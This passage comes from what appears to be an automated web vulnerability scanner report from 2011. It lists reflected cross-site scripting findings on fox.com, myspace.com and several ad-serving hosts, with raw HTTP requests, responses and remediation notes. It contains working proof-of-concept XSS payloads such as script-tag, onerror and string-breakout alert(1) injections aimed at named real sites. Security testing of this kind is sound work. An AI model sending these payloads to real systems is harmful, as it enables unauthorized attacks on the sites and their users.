Accept: */*
Referer: http://www.fox.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.113
Content-Type: text/html; charset=utf-8
Content-Length: 22199
Cache-Control: max-age=3600
Date: Sun, 02 Oct 2011 22:58:59 GMT
Connection: close
Vary: Accept-Encoding
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 59c29"-alert(1)-"8064487c9c1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /_ui/js59c29"-alert(1)-"8064487c9c1/fox_homepage_vars.php?date= HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.106
Content-Type: text/html; charset=utf-8
Content-Length: 22171
Cache-Control: max-age=3600
Date: Sun, 02 Oct 2011 22:59:03 GMT
Connection: close
Vary: Accept-Encoding
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 29dad"-alert(1)-"706770c3e2c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8cf38"-alert(1)-"fad2b22c56 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7064e"-alert(1)-"1ed04ee39f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 51f89"-alert(1)-"65f4a9e9c7a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 40491"-alert(1)-"e6bb8e09af1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload df3ec"-alert(1)-"0fcc499bca2 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cda49"-alert(1)-"7795fd16c1d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload faffe"-alert(1)-"cfa0ec82037 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 18a2c"-alert(1)-"7fdab8ea2b0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Response
HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.114
Content-Type: text/html; charset=utf-8
Content-Length: 22241
Cache-Control: max-age=3600
Date: Sun, 02 Oct 2011 23:09:39 GMT
Connection: close
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>FOX Broadcastin ...[SNIP]... //Site Sub - Section s_analytics.prop8="fox:shows:_ui82a36%22-alert(1)-%228535eeb0e17:fox_playe" //Site Sub-Section 2 s_analytics.prop9="fox:shows:_ui82a36%22-alert(1)-%228535eeb0e17:fox_playerswf18a2c"-alert(1)-"7fdab8ea2b0" s_analytics.prop15="sub section:flvplayer" //Content Type s_analytics.prop17="" //Campaign s_analytics.prop35="" //Content Title s_analytics.prop36="" s_analytics.prop42 = (s_analytics.get ...[SNIP]...
2.240. http://www.myspace.com/search/people [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.myspace.com
Path:
/search/people
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dfacc"><script>alert(1)</script>3db7b7228e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 2e0a6<script>alert(1)</script>985c8e5e0e4 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hosted/util/getRemoteDomainCookies.js?callback=__nbcadops_xasis.getRemoteDomainCookiesCallback2e0a6<script>alert(1)</script>985c8e5e0e4 HTTP/1.1
Host: www.nbcudigitaladops.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.nbc.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Server: Apache
Content-Length: 146
Content-Type: application/javascript
ETag: "15f491-44-4aacd3f4ef780"
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Expires: Sun, 02 Oct 2011 23:03:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 02 Oct 2011 23:03:12 GMT
Connection: close
The value of the skin request parameter is copied into the HTML document as plain text between tags. The payload 96d92<x%20style%3dx%3aexpression(alert(1))>72b3095c178 was submitted in the skin parameter. This input was echoed as 96d92<x style=x:expression(alert(1))>72b3095c178 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload db02a(a)c1b3025bd21 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 1ed53(a)70df5e1988a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 62de1(a)a00d971dc5d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload f2b70(a)d5aa542911d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 596b2(a)64259b478de was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 17e4a(a)9c3055125a6 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 251a5(a)027fb17edd7 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload c0bcd(a)8afefe14983 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d2510'-alert(1)-'c3b5e79b045 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Content-Type: text/javascript
Date: Sun, 02 Oct 2011 22:54:54 GMT
Content-Length: 597
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2d598"-alert(1)-"8cbd1ea9ede was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjss/choices.truste.com/10736/9003/ca?pid=hp01&aid=hp02&cid=72186705&c=cachebuster&w=160&h=600&plc=tl&js=10 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.google.com/search?hl=en&q=2d598"-alert(1)-"8cbd1ea9ede
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=0F63AD242202D43D833854E83C53A58A; Path=/
Content-Type: text/javascript
Date: Sun, 02 Oct 2011 23:14:26 GMT
Connection: close
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a853f"-alert(1)-"bbeb9762c7e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjss/dc/10736/179733/adj/N5823.8705.MLB/B5918949.10;sz=160x600;ord=6927014? HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.google.com/search?hl=en&q=a853f"-alert(1)-"bbeb9762c7e
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=1E2429F5EBFB2A940BD072BC0FC6AB6C; Path=/
Content-Type: text/javascript
Date: Sun, 02 Oct 2011 23:14:25 GMT
Connection: close
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a3d11"-alert(1)-"2f4ef636518 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
2.255. http://myspace.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: Information
Confidence: Certain
Host: http://myspace.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed6f4"><script>alert(1)</script>9fe1e812605 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /?ed6f4"><script>alert(1)</script>9fe1e812605=1 HTTP/1.1
Host: myspace.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<html><head><title>Object moved</title></head><body><h2>Object moved to <a href="http://www.myspace.com/?ed6f4"><script>alert(1)</script>9fe1e812605=1">here</a>.</h2></body></html>
The value of the s_vi cookie is copied into the HTML document as plain text between tags. The payload b4152<script>alert(1)</script>0a720ee56a was submitted in the s_vi cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 76b68"><img%20src%3da%20onerror%3dalert(1)>6278c58b71f was submitted in the REST URL parameter 4. This input was echoed as 76b68"><img src=a onerror=alert(1)>6278c58b71f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1509a'%3b7c5462401ec was submitted in the REST URL parameter 4. This input was echoed as 1509a';7c5462401ec in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.